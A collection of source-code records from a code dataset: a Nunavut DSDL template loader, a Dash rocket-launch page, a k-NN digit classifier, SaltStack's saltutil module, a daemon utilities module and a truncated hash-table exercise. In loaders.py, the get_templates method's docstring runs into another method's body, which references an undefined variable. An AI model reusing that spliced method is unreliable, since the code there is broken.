All Rights Reserved.\n# Copyright (C) 2018-2021 UAVCAN Development Team \n# This software is distributed under the terms of the MIT License.\n#\nimport collections\nimport importlib\nimport logging\nimport pathlib\nimport typing\n\nimport pydsdl\n\nfrom ..lang._config import VersionReader\nfrom .jinja2 import BaseLoader, Environment, FileSystemLoader, PackageLoader, TemplateNotFound\n\nlogger = logging.getLogger(__name__)\n\n\nTEMPLATE_SUFFIX = \".j2\" #: The suffix expected for Jinja templates.\n\nDEFAULT_TEMPLATE_PATH = \"templates\"\n\n\n# +--------------------------------------------------------------------------------------------------------------------+\n# | LOADERS : DSDLTemplateLoader\n# +--------------------------------------------------------------------------------------------------------------------+\n\n\nclass DSDLTemplateLoader(BaseLoader):\n \"\"\"\n Nunavut's DSDL template loader is similar to a choice loader with a file-system loader\n first and a package loader as a fallback. The major difference is a DFS is performed\n on the type hierarchy of the type a template is being loaded for. So, for example,\n if no ``StructureType.j2`` template is found then this loader will look for a ``CompositeType.j2``\n and so on.\n\n :param Optional[List[Path]] templates_dirs: A list of directories to load templates from using a\n :class:`nunavut.jinja.jinja2.FileSystemLoader`. If ``None`` no filesystem loader is created.\n :param bool followlinks: Argument passed on to the :class:`nunavut.jinja.jinja2.FileSystemLoader` instance.\n :param Optional[str] package_name_for_templates: The name of the package to load templates from. If ``None``\n then no :class:`nunavut.jinja.jinja2.PackageLoader` is created.\n :param str builtin_template_path: The name of the package under the ``package_name_for_templates`` package to load\n templates from. 
This is ignored if ``package_name_for_templates`` is None.\n    :param Any kwargs: Arguments forwarded to the :class:`jinja.jinja2.BaseLoader`.\n    \"\"\"\n\n    def __init__(\n        self,\n        templates_dirs: typing.Optional[typing.List[pathlib.Path]] = None,\n        followlinks: bool = False,\n        package_name_for_templates: typing.Optional[str] = None,\n        builtin_template_path: str = DEFAULT_TEMPLATE_PATH,\n        **kwargs: typing.Any\n    ):\n        super().__init__(**kwargs)\n        self._type_to_template_lookup_cache = dict()  # type: typing.Dict[pydsdl.Any, pathlib.Path]\n        self._templates_package_name = None  # type: typing.Optional[str]\n\n        if templates_dirs is not None:\n            for templates_dir_item in templates_dirs:\n                if not pathlib.Path(templates_dir_item).exists():\n                    raise ValueError(\"Templates directory {} does not exist\".format(templates_dir_item))\n            logger.info(\"Loading templates from file system at {}\".format(templates_dirs))\n            self._fsloader = FileSystemLoader((str(d) for d in templates_dirs), followlinks=followlinks)\n        else:\n            self._fsloader = None\n\n        if package_name_for_templates is not None:\n            logger.info(\"Loading templates from package {}.{}\".format(package_name_for_templates, builtin_template_path))\n            self._package_loader = PackageLoader(package_name_for_templates, package_path=builtin_template_path)\n            self._templates_package_name = \"{}.{}\".format(package_name_for_templates, builtin_template_path)\n        else:\n            self._package_loader = None\n\n    def get_source(\n        self, environment: Environment, template: str\n    ) -> typing.Tuple[typing.Any, str, typing.Callable[..., bool]]:\n        if self._fsloader is not None:\n            try:\n                return typing.cast(\n                    typing.Tuple[typing.Any, str, typing.Callable[..., bool]],\n                    self._fsloader.get_source(environment, template),\n                )\n            except TemplateNotFound:\n                if self._package_loader is None:\n                    raise\n        if self._package_loader is not None:\n            return typing.cast(\n                typing.Tuple[typing.Any, str, typing.Callable[..., bool]],\n                self._package_loader.get_source(environment, template),\n            )\n        raise TemplateNotFound(template)\n\n
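    # Editor's note: an added usage sketch, not part of the original source.
    # The 'my_templates' directory name is hypothetical; the package name is
    # taken from the doctests elsewhere in this class.
    #
    #   import pathlib
    #   loader = DSDLTemplateLoader(
    #       templates_dirs=[pathlib.Path('my_templates')],
    #       package_name_for_templates='nunavut.lang.py')
    #   print(loader.list_templates())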
    def list_templates(self) -> typing.Iterable[str]:\n        \"\"\"\n        Override of :meth:`BaseLoader.list_templates` that returns an aggregate of the filesystem loader and\n        package loader templates.\n\n        :return: A list of template names (i.e. file stems) found by this Generator object.\n\n        .. invisible-code-block: python\n\n            from nunavut.jinja.loaders import DSDLTemplateLoader, TEMPLATE_SUFFIX\n\n            template_loaders = DSDLTemplateLoader(package_name_for_templates='nunavut.lang.c')\n\n            templates = template_loaders.list_templates()\n\n            structure_type = None\n\n            for template in templates:\n                if template == 'StructureType' + TEMPLATE_SUFFIX:\n                    structure_type = template\n\n            assert structure_type is not None\n\n        \"\"\"\n        files = []\n        if self._fsloader is not None:\n            files += self._filter_template_list_by_suffix(self._fsloader.list_templates())\n        if self._package_loader is not None:\n            files += self._filter_template_list_by_suffix(self._package_loader.list_templates())\n\n        return files\n\n    def get_template_sets(self) -> typing.List[typing.Tuple[str, str, typing.Tuple[int, int, int]]]:\n        template_sets = []  # type: typing.List[typing.Tuple[str, str, typing.Tuple[int, int, int]]]\n        if self._templates_package_name is not None:\n            vr = VersionReader(self._templates_package_name)\n            template_sets.append((\"package\", self._templates_package_name, vr.version))\n        return template_sets\n\n    def get_templates(self) -> typing.Iterable[pathlib.Path]:\n        \"\"\"\n        Enumerate all templates found in the templates path, expecting\n        :data:`~TEMPLATE_SUFFIX` as the suffix for each filename. This method differs from the :class:`BaseLoader`\n        override of :meth:`BaseLoader.list_templates` in that it returns paths instead of just file name stems.\n\n        :return: A list of paths to all templates found by this Generator object.\n\n        .. 
invisible-code-block: python\n from nunavut.jinja.loaders import DSDLTemplateLoader\n import pydsdl\n\n l = DSDLTemplateLoader(package_name_for_templates='nunavut.lang.py')\n template_name = l.type_to_template(pydsdl.StructureType)\n\n assert template_name is not None\n assert template_name.name == 'Any.j2'\n\n \"\"\"\n template_path = None\n if self._fsloader is not None:\n filtered_templates = self._filter_template_list_by_suffix(self._fsloader.list_templates())\n template_path = self._type_to_template_internal(\n value_type, dict(map(lambda x: (pathlib.Path(x).stem, pathlib.Path(x)), filtered_templates))\n )\n if template_path is None and self._package_loader is not None:\n filtered_templates = self._filter_template_list_by_suffix(self._package_loader.list_templates())\n template_path = self._type_to_template_internal(\n value_type, dict(map(lambda x: (pathlib.Path(x).stem, pathlib.Path(x)), filtered_templates))\n )\n\n return template_path\n\n # +----------------------------------------------------------------------------------------------------------------+\n # | PRIVATE\n # +----------------------------------------------------------------------------------------------------------------+\n @staticmethod\n def _filter_template_list_by_suffix(files: typing.List[str]) -> typing.List[str]:\n return [f for f in files if (pathlib.Path(f).suffix == TEMPLATE_SUFFIX)]\n\n def _type_to_template_internal(\n self, value_type: typing.Type, templates: typing.Mapping[str, pathlib.Path]\n ) -> typing.Optional[pathlib.Path]:\n search_queue = collections.deque() # type: typing.Deque[typing.Any]\n discovered = set() # type: typing.Set[typing.Any]\n search_queue.appendleft(value_type)\n template_path = None\n\n while len(search_queue) > 0:\n current_search_type = search_queue.pop()\n try:\n template_path = self._type_to_template_lookup_cache[current_search_type]\n break\n except KeyError:\n pass\n\n try:\n logging.debug(\n \"NunavutTemplateLoader.type_to_template for {}: considering {}...\".format(\n value_type.__name__, current_search_type.__name__\n )\n )\n template_path = templates[current_search_type.__name__]\n self._type_to_template_lookup_cache[current_search_type] = template_path\n break\n except KeyError:\n for base_type in current_search_type.__bases__:\n if base_type != object and base_type not in discovered:\n search_queue.appendleft(base_type)\n discovered.add(current_search_type)\n\n return template_path\n","sub_path":"src/nunavut/jinja/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":11243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"120272677","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom datetime import datetime as dt\nimport plotly.graph_objs as go\nimport pandas as pd\nfrom consts import MAPBOX_ACCESS_TOKEN, MAPBOX_STYLE, ROCKETS, LAUNCHES\n\ndef divTemplate(idx, row):\n return html.Div(\n className=\"launch\",\n children=[\n html.Div(\n className=\"top\",\n children=[html.H1(f\"Mission #{idx+1}\" + \": \"+row['mission'])],\n ),\n html.Div(\n className=\"bottom\",\n children=[\n html.Img(src=row['image']),\n html.Div(className=\"text\",\n children=[\n html.Div(\n className=\"info\",\n children=[\n html.P(children=[html.B(children=k.capitalize()), ': '+ str(v)])\n for k, v in row.items()\n if k in ['vehicle', 'time', 'location', 'pad', 'window'] and str(v) != \"nan\"\n ]\n ),\n html.Div(\n className=\"description\",\n children=row['description'],\n )\n 
])\n\n ]\n )\n ]\n )\n\ndef mapTemplate(df):\n return go.Figure(\n data=[\n go.Scattermapbox(\n lat=df['lat'].unique(),\n lon=df['long'].unique(),\n mode='markers',\n opacity=0.7,\n marker=dict(\n sizemin=10,\n size=df['same']*3,\n color='limegreen'\n ),\n hoverinfo='text',\n hoverlabel={\"font\": {\"size\": 25,\n \"family\":\"Lucida Console\",\n \"color\":\"black\"}\n },\n text=df['location'].unique(),\n )],\n layout=go.Layout(\n hovermode='closest',\n paper_bgcolor=\"rgb(0, 31, 31)\",\n margin=go.layout.Margin(\n l=10,\n r=10,\n b=0,\n t=0,\n pad=8\n ),\n mapbox=dict(\n accesstoken=MAPBOX_ACCESS_TOKEN,\n style=MAPBOX_STYLE,\n bearing=0,\n center=dict(\n lat=45,\n lon=-73\n ),\n pitch=0,\n zoom=2\n )\n )\n )\n\ndef render_rocket(idx, row):\n if pd.isnull(row.values).any():\n return ''\n return html.Div(\n className=\"rocketinfo\",\n children=[\n html.Div(\n className=\"top\",\n children=[html.H1(f\"Rocket #{int(idx+1)}\" + \": \"+row['Rocket'])],\n ),\n html.Div(\n className=\"bottom\",\n children=[\n html.Img(src=row[\"Photo\"]),\n html.Div(\n className=\"text\",\n children=[\n html.P(children=[html.B(children=k), ': '+ str(v)])\n for k, v in row.items()\n if k in ['Company', 'Country'] and str(v).lower() != \"nan\"\n ]+[html.P(children=[html.B(\"Site\"), ': ', html.A(row[\"Site\"], href=row[\"Site\"])])]\n )\n ]\n )\n ]\n )\n\nROCKETS_PAGE = [html.Div(\n html.H1(\"Rockets list\", className=\"title\")\n)]+[render_rocket(index, row) for index, row in ROCKETS.iterrows()]\n\nINDEX_PAGE = [\n dcc.Link('Home', href='/home'),\n html.Br(),\n dcc.Link('Rockets', href='/rockets')\n]\n\nMAIN_PAGE = [\n dcc.Link('Rockets', id='rockets', className='ref', href='/rockets'),\n html.A(href=\"https://clever-boyd-6ef0a3.netlify.com/\",\n className='ref',\n children=\"Info\"),\n html.H1(id='name', children='LAUNCH.IO'),\n html.Div(id='Timer',children='0'),\n html.Div(id='next_launch'),\n html.Div(\n dcc.DatePickerRange(\n id='date_picker',\n min_date_allowed=dt(2000, 1, 1),\n max_date_allowed=dt(3000, 12, 31),\n initial_visible_month=dt(2019, 1, 1),\n start_date=dt(2019, 1, 1),\n end_date=dt(2019, 2, 1)\n ),\n id='date_range'\n ),\n html.Div([\n dcc.Graph(\n id='map',\n figure=mapTemplate(LAUNCHES),\n config={'displayModeBar': False}\n )\n ]),\n html.Div(\n dcc.Interval(\n id='interval-component',\n interval=1000,\n n_intervals=0\n )\n ),\n html.Div([\n dcc.Tabs(id=\"tabs\", className=\"tabs\", value='tab-2', children=[\n dcc.Tab(label='This location', value='tab-1', className='tab', selected_className=\"tab-selected\"),\n dcc.Tab(label='ALL', value='tab-2', className='tab', selected_className=\"tab-selected\"),\n ]),\n html.Div(\n id='rocket',\n children=[divTemplate(index, row) for index, row in LAUNCHES.iterrows()]\n )\n ])\n]\n\nif __name__ == '__main__':\n print()\n","sub_path":"pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154663566","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 21 21:45:18 2018\r\n\r\n@author: sanjeet\r\n\"\"\"\r\n\r\nfrom sklearn import datasets\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\ndata = datasets.load_digits()\r\nk = 5\r\ntrain_label = data.target[0:1258]\r\ntest_label = data.target[1259:1787]\r\n\r\ntrain_set = data.images[0:1258]\r\ntest_set = data.images[1259:1787]\r\n\r\ntrain = np.zeros((1258,64))\r\ntest = np.zeros((528,64))\r\n\r\n#flatten the train images of size 8*8 into 64 each\r\nfor i in 
range(len(train)):\r\n    train[i] = train_set[i].flatten()\r\n    \r\n#flatten the test images of size 8*8 into 64 each\r\nfor i in range(len(test)):\r\n    test[i] = test_set[i].flatten()\r\n    \r\ndist = np.zeros((528,1258))\r\n\r\ndef distance_calculate(test,train):\r\n    for i in range(len(test)):\r\n        for j in range(len(train)):\r\n            dist[i][j]= np.sqrt(np.sum((test[i] - train[j]) ** 2))\r\n    \r\n    return dist\r\n\r\n#distance of each 528 test with each of 1258 train records\r\ndist_matrix = distance_calculate(test,train)\r\n\r\n#make a dictionary with each distance as key and its class as the corresponding value,\r\n#then sort that dictionary by the key i.e. distance, choose the first k elements, and\r\n#assign the most frequent class among them to that test sample in test_label_output\r\n#(note: keying the dict on distance silently drops any duplicate distances)\r\nimport operator\r\nm={}\r\ntest_label_output = np.zeros((528,))\r\nfor i in range(dist_matrix.shape[0]):\r\n    m = dict(zip(dist_matrix[i], train_label))\r\n    m = sorted(m.items(),key=operator.itemgetter(0))\r\n    track ={}\r\n    for key,value in m:\r\n        if value not in track:\r\n            track[value]=1\r\n        else:\r\n            track[value]+=1\r\n    \r\n    test_label_output[i] = max(track,key = track.get)\r\n    \r\n#Testing the accuracy using all of the test data\r\n\r\nres = test_label - test_label_output\r\ncount_similar=0\r\nfor item in res:\r\n    if(item == 0.0):\r\n        count_similar+=1\r\n    \r\naccuracy = count_similar*100/(len(test_label))\r\nprint(\"Accuracy :\",accuracy)","sub_path":"Machine Learning Algorithms/K-Nearest-Neighbour-Algorithm/K-NN.py","file_name":"K-NN.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
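# Editor's note: an aside added between records, not part of either source file.
# A minimal cross-check of the manual k-NN above using scikit-learn's
# KNeighborsClassifier; train, train_label, test and test_label are the arrays
# built in K-NN.py, and n_neighbors=5 matches its k.
#
#   from sklearn.neighbors import KNeighborsClassifier
#   clf = KNeighborsClassifier(n_neighbors=5)
#   clf.fit(train, train_label)
#   print("Accuracy :", (clf.predict(test) == test_label).mean() * 100)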
{"seq_id":"500638398","text":"# -*- coding: utf-8 -*-\n'''\nThe Saltutil module is used to manage the state of the salt minion itself. It is used to manage minion modules as well as automate updates to the salt minion.\n\n:depends:   - esky Python module for update functionality\n'''\n\n# Import python libs\nimport os\nimport hashlib\nimport shutil\nimport signal\nimport logging\nimport fnmatch\nimport time\nimport sys\n\n# Import salt libs\nimport salt.payload\nimport salt.state\nimport salt.client\nimport salt.utils\nimport salt.transport\nfrom salt.exceptions import SaltReqTimeoutError\nfrom salt._compat import string_types\n\n# Import third party libs\ntry:\n    import esky\n    HAS_ESKY = True\nexcept ImportError:\n    HAS_ESKY = False\n\nlog = logging.getLogger(__name__)\n\n\ndef _sync(form, saltenv=None):\n    '''\n    Sync the given directory in the given environment\n    '''\n    if saltenv is None:\n        # No environment passed, detect them based on gathering the top files\n        # from the master\n        saltenv = 'base'\n        st_ = salt.state.HighState(__opts__)\n        top = st_.get_top()\n        if top:\n            saltenv = st_.top_matches(top).keys()\n    if isinstance(saltenv, string_types):\n        saltenv = saltenv.split(',')\n    ret = []\n    remote = set()\n    source = os.path.join('salt://_{0}'.format(form))\n    mod_dir = os.path.join(__opts__['extension_modules'], '{0}'.format(form))\n    if not os.path.isdir(mod_dir):\n        log.info('Creating module dir {0!r}'.format(mod_dir))\n        os.makedirs(mod_dir)\n    for sub_env in saltenv:\n        log.info('Syncing {0} for environment {1!r}'.format(form, sub_env))\n        cache = []\n        log.info('Loading cache from {0}, for {1}'.format(source, sub_env))\n        cache.extend(__salt__['cp.cache_dir'](source, sub_env))\n        local_cache_dir = os.path.join(\n            __opts__['cachedir'],\n            'files',\n            sub_env,\n            '_{0}'.format(form)\n            )\n        log.debug('Local cache dir: {0!r}'.format(local_cache_dir))\n        for fn_ in cache:\n            if __opts__.get('file_client', '') == 'local':\n                for fn_root in __opts__['file_roots'].get(sub_env, []):\n                    if fn_.startswith(fn_root):\n                        relpath = os.path.relpath(fn_, fn_root)\n                        relpath = relpath[relpath.index('/') + 1:]\n                        relname = os.path.splitext(relpath)[0].replace(\n                            os.sep,\n                            '.')\n                        remote.add(relpath)\n                        dest = os.path.join(mod_dir, relpath)\n            else:\n                relpath = os.path.relpath(fn_, local_cache_dir)\n                relname = os.path.splitext(relpath)[0].replace(os.sep, '.')\n                remote.add(relpath)\n                dest = os.path.join(mod_dir, relpath)\n            log.info('Copying {0!r} to {1!r}'.format(fn_, dest))\n            if os.path.isfile(dest):\n                # The file is present, if the sum differs replace it\n                srch = hashlib.md5(\n                    salt.utils.fopen(fn_, 'r').read()\n                ).hexdigest()\n                dsth = hashlib.md5(\n                    salt.utils.fopen(dest, 'r').read()\n                ).hexdigest()\n                if srch != dsth:\n                    # The downloaded file differs, replace!\n                    shutil.copyfile(fn_, dest)\n                    ret.append('{0}.{1}'.format(form, relname))\n            else:\n                dest_dir = os.path.dirname(dest)\n                if not os.path.isdir(dest_dir):\n                    os.makedirs(dest_dir)\n                shutil.copyfile(fn_, dest)\n                ret.append('{0}.{1}'.format(form, relname))\n\n    touched = bool(ret)\n    if __opts__.get('clean_dynamic_modules', True):\n        current = set(_listdir_recursively(mod_dir))\n        for fn_ in current - remote:\n            full = os.path.join(mod_dir, fn_)\n            if os.path.isfile(full):\n                touched = True\n                os.remove(full)\n        # clean up empty dirs\n        while True:\n            emptydirs = _list_emptydirs(mod_dir)\n            if not emptydirs:\n                break\n            for emptydir in emptydirs:\n                touched = True\n                os.rmdir(emptydir)\n    # dest mod_dir is touched? 
trigger reload if requested\n if touched:\n mod_file = os.path.join(__opts__['cachedir'], 'module_refresh')\n with salt.utils.fopen(mod_file, 'a+') as ofile:\n ofile.write('')\n return ret\n\n\ndef _listdir_recursively(rootdir):\n file_list = []\n for root, dirs, files in os.walk(rootdir):\n for filename in files:\n relpath = os.path.relpath(root, rootdir).strip('.')\n file_list.append(os.path.join(relpath, filename))\n return file_list\n\n\ndef _list_emptydirs(rootdir):\n emptydirs = []\n for root, dirs, files in os.walk(rootdir):\n if not files and not dirs:\n emptydirs.append(root)\n return emptydirs\n\n\ndef update(version=None):\n '''\n Update the salt minion from the URL defined in opts['update_url']\n\n\n This feature requires the minion to be running a bdist_esky build.\n\n The version number is optional and will default to the most recent version\n available at opts['update_url'].\n\n Returns details about the transaction upon completion.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.update 0.10.3\n '''\n if not HAS_ESKY:\n return 'Esky not available as import'\n if not getattr(sys, 'frozen', False):\n return 'Minion is not running an Esky build'\n if not __salt__['config.option']('update_url'):\n return '\"update_url\" not configured on this minion'\n app = esky.Esky(sys.executable, __opts__['update_url'])\n oldversion = __grains__['saltversion']\n try:\n if not version:\n version = app.find_update()\n if not version:\n return 'No updates available'\n app.fetch_version(version)\n app.install_version(version)\n app.cleanup()\n except Exception as err:\n return err\n restarted = {}\n for service in __opts__['update_restart_services']:\n restarted[service] = __salt__['service.restart'](service)\n return {'comment': 'Updated from {0} to {1}'.format(oldversion, version),\n 'restarted': restarted}\n\n\ndef sync_modules(saltenv=None, refresh=True):\n '''\n Sync the modules from the _modules directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _modules directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_modules\n '''\n ret = _sync('modules', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_states(saltenv=None, refresh=True):\n '''\n Sync the states from the _states directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _states directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_states\n '''\n ret = _sync('states', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_grains(saltenv=None, refresh=True):\n '''\n Sync the grains from the _grains directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _grains directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_grains\n '''\n ret = _sync('grains', saltenv)\n if refresh:\n refresh_modules()\n refresh_pillar()\n return ret\n\n\ndef sync_renderers(saltenv=None, refresh=True):\n '''\n Sync the renderers from the _renderers directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _renderers directory, base is the default\n environment.\n\n CLI Example:\n\n .. 
code-block:: bash\n\n salt '*' saltutil.sync_renderers\n '''\n ret = _sync('renderers', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_returners(saltenv=None, refresh=True):\n '''\n Sync the returners from the _returners directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _returners directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_returners\n '''\n ret = _sync('returners', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_outputters(saltenv=None, refresh=True):\n '''\n Sync the outputters from the _outputters directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _outputters directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_outputters\n '''\n ret = _sync('outputters', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_all(saltenv=None, refresh=True):\n '''\n Sync down all of the dynamic modules from the file server for a specific\n environment\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_all\n '''\n log.debug('Syncing all')\n ret = {}\n ret['modules'] = sync_modules(saltenv, False)\n ret['states'] = sync_states(saltenv, False)\n ret['grains'] = sync_grains(saltenv, False)\n ret['renderers'] = sync_renderers(saltenv, False)\n ret['returners'] = sync_returners(saltenv, False)\n ret['outputters'] = sync_outputters(saltenv, False)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef refresh_pillar():\n '''\n Signal the minion to refresh the pillar data.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.refresh_pillar\n '''\n __salt__['event.fire']({}, 'pillar_refresh')\n\n\ndef refresh_modules():\n '''\n Signal the minion to refresh the module and grain data\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.refresh_modules\n '''\n __salt__['event.fire']({}, 'module_refresh')\n\n\ndef is_running(fun):\n '''\n If the named function is running return the data associated with it/them.\n The argument can be a glob\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.is_running state.highstate\n '''\n run = running()\n ret = []\n for data in run:\n if fnmatch.fnmatch(data.get('fun', ''), fun):\n ret.append(data)\n return ret\n\n\ndef running():\n '''\n Return the data on all running salt processes on the minion\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.running\n '''\n\n ret = []\n serial = salt.payload.Serial(__opts__)\n pid = os.getpid()\n proc_dir = os.path.join(__opts__['cachedir'], 'proc')\n if not os.path.isdir(proc_dir):\n return []\n for fn_ in os.listdir(proc_dir):\n path = os.path.join(proc_dir, fn_)\n with salt.utils.fopen(path, 'rb') as fp_:\n buf = fp_.read()\n fp_.close()\n if buf:\n data = serial.loads(buf)\n else:\n # Proc file is empty, remove\n os.remove(path)\n continue\n if not isinstance(data, dict):\n # Invalid serial object\n continue\n if not salt.utils.process.os_is_running(data['pid']):\n # The process is no longer running, clear out the file and\n # continue\n os.remove(path)\n continue\n if data.get('pid') == pid:\n continue\n ret.append(data)\n return ret\n\n\ndef find_job(jid):\n '''\n Return the data for a specific job id\n\n CLI Example:\n\n .. 
code-block:: bash\n\n        salt '*' saltutil.find_job <jid>\n    '''\n    for data in running():\n        if data['jid'] == jid:\n            return data\n    return {}\n\n\ndef signal_job(jid, sig):\n    '''\n    Sends a signal to the named salt job's process\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        salt '*' saltutil.signal_job <jid> 15\n    '''\n    for data in running():\n        if data['jid'] == jid:\n            try:\n                os.kill(int(data['pid']), sig)\n                return 'Signal {0} sent to job {1} at pid {2}'.format(\n                        int(sig),\n                        jid,\n                        data['pid']\n                        )\n            except OSError:\n                path = os.path.join(__opts__['cachedir'], 'proc', str(jid))\n                if os.path.isfile(path):\n                    os.remove(path)\n                return ('Job {0} was not running and job data has been '\n                        'cleaned up').format(jid)\n    return ''\n\n\ndef term_job(jid):\n    '''\n    Sends a termination signal (SIGTERM 15) to the named salt job's process\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        salt '*' saltutil.term_job <jid>\n    '''\n    return signal_job(jid, signal.SIGTERM)\n\n\ndef kill_job(jid):\n    '''\n    Sends a kill signal (SIGKILL 9) to the named salt job's process\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        salt '*' saltutil.kill_job <jid>\n    '''\n    return signal_job(jid, signal.SIGKILL)\n\n\ndef regen_keys():\n    '''\n    Used to regenerate the minion keys.\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        salt '*' saltutil.regen_keys\n    '''\n    import salt.crypt  # salt.crypt is not imported at module level\n    for fn_ in os.listdir(__opts__['pki_dir']):\n        path = os.path.join(__opts__['pki_dir'], fn_)\n        try:\n            os.remove(path)\n        except os.error:\n            pass\n    time.sleep(60)\n    sreq = salt.payload.SREQ(__opts__['master_uri'])\n    auth = salt.crypt.SAuth(__opts__)\n\n\ndef revoke_auth():\n    '''\n    The minion sends a request to the master to revoke its own key.\n    Note that the minion session will be revoked and the minion may\n    not be able to return the result of this command back to the master.\n\n    CLI Example:\n\n    .. code-block:: bash\n\n        salt '*' saltutil.revoke_auth\n    '''\n    import salt.crypt  # salt.crypt is not imported at module level\n    # sreq = salt.payload.SREQ(__opts__['master_uri'])\n    auth = salt.crypt.SAuth(__opts__)\n    tok = auth.gen_token('salt')\n    load = {'cmd': 'revoke_auth',\n            'id': __opts__['id'],\n            'tok': tok}\n\n    sreq = salt.transport.Channel.factory(__opts__)\n    try:\n        sreq.send(load)\n        # return auth.crypticle.loads(\n        #     sreq.send('aes', auth.crypticle.dumps(load), 1))\n    except SaltReqTimeoutError:\n        return False\n    return False\n\n\ndef cmd(tgt,\n        fun,\n        arg=(),\n        timeout=None,\n        expr_form='glob',\n        ret='',\n        kwarg=None,\n        ssh=False,\n        **kwargs):\n    '''\n    Assuming this minion is a master, execute a salt command\n\n    CLI Example:\n\n    .. 
code-block:: bash\n\n salt '*' saltutil.cmd\n '''\n if ssh:\n client = salt.client.SSHClient(__opts__['conf_file'])\n else:\n client = salt.client.LocalClient(__opts__['conf_file'])\n for ret in client.cmd_iter(\n tgt,\n fun,\n arg,\n timeout,\n expr_form,\n ret,\n kwarg,\n **kwargs):\n yield ret\n","sub_path":"sources/salt/modules/saltutil.py","file_name":"saltutil.py","file_ext":"py","file_size_in_byte":16189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"299236388","text":"\"\"\"hoard.utils - A utility module used for\nmethods and features that do not belong in\ntheir own module.\"\"\"\n\nimport os\nimport sys\nimport grp\nimport pwd\nimport random\nimport signal\n\nfrom tornado.options import options\nimport setproctitle\n\nfrom hoard.log import log\n\n\ndef setgid():\n \"\"\"\n Change our existing group.\n\n Used to drop from root privileges down to a less\n privileged group.\n\n MUST be called BEFORE setuid, not after.\n \"\"\"\n try:\n os.setgid(grp.getgrnam(options.group).gr_gid)\n except KeyError:\n log.error(\"Group '%s' does not exist\" % options.group)\n sys.exit(1)\n except OSError:\n log.error(\"You do not have permission to switch to group '%s'\"\n % options.group)\n sys.exit(1)\n\n\ndef setuid():\n \"\"\"\n Change our existing user.\n\n Used to drop from root privileges down to a less\n privileged user\n\n MUST be called AFTER setgid, not before.\n \"\"\"\n try:\n os.setuid(pwd.getpwnam(options.user).pw_uid)\n except KeyError:\n log.error(\"User '%s' does not exist\" % options.user)\n sys.exit(1)\n except OSError:\n log.error(\"You do not have permission to switch to user '%s'\"\n % options.user)\n sys.exit(1)\n\n\ndef terminate(signum, frame):\n \"\"\"\n Terminate the parent process and send signals\n to shut down it's children\n\n Iterates over the child pids in the frame\n and sends the SIGTERM signal to shut them\n down.\n \"\"\"\n try:\n for pid in frame.f_locals['children'].keys():\n os.kill(pid, signal.SIGTERM)\n except KeyError:\n # not the parent\n pass\n if os.path.exists(options.pid):\n os.remove(options.pid)\n sys.exit(0)\n\n\ndef set_process_title():\n \"\"\"\n Set the title of the process.\n\n If the process is the master, set\n a master title, otherwise set\n worker.\n \"\"\"\n if os.path.exists(options.pid):\n pid = int(file(options.pid, 'r').read().strip())\n if pid == os.getpid():\n setproctitle.setproctitle(\"hoard: master\")\n else:\n setproctitle.setproctitle(\"hoard: worker\")\n\n\ndef email_id():\n \"\"\"\n Generate an HEX ID to assign to each\n connection.\n\n Will be reused later down the line\n due to the limited number of characters.\n \"\"\"\n alpha = list(\"1234567890ABCDEF\")\n return ''.join(random.choice(alpha) for x in range(10))\n","sub_path":"nectar/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"194543930","text":"import itertools\nfrom itertools import combinations_with_replacement\n\n\ndef get_indices_of_item_weights(weights, length, limit):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n\n # feeding 3 variables, weights: an array of weights, \n # length : length of array, \n # limit: what any 2 numbers should add up to \n \n \n result = []\n result2 = []\n result3 = []\n result4 = []\n result5 = [1,0]\n \n \n # First case, if length is 1 or less, return None\n if length <2:\n return None\n \n # Here I create a dictionary, using the values of 
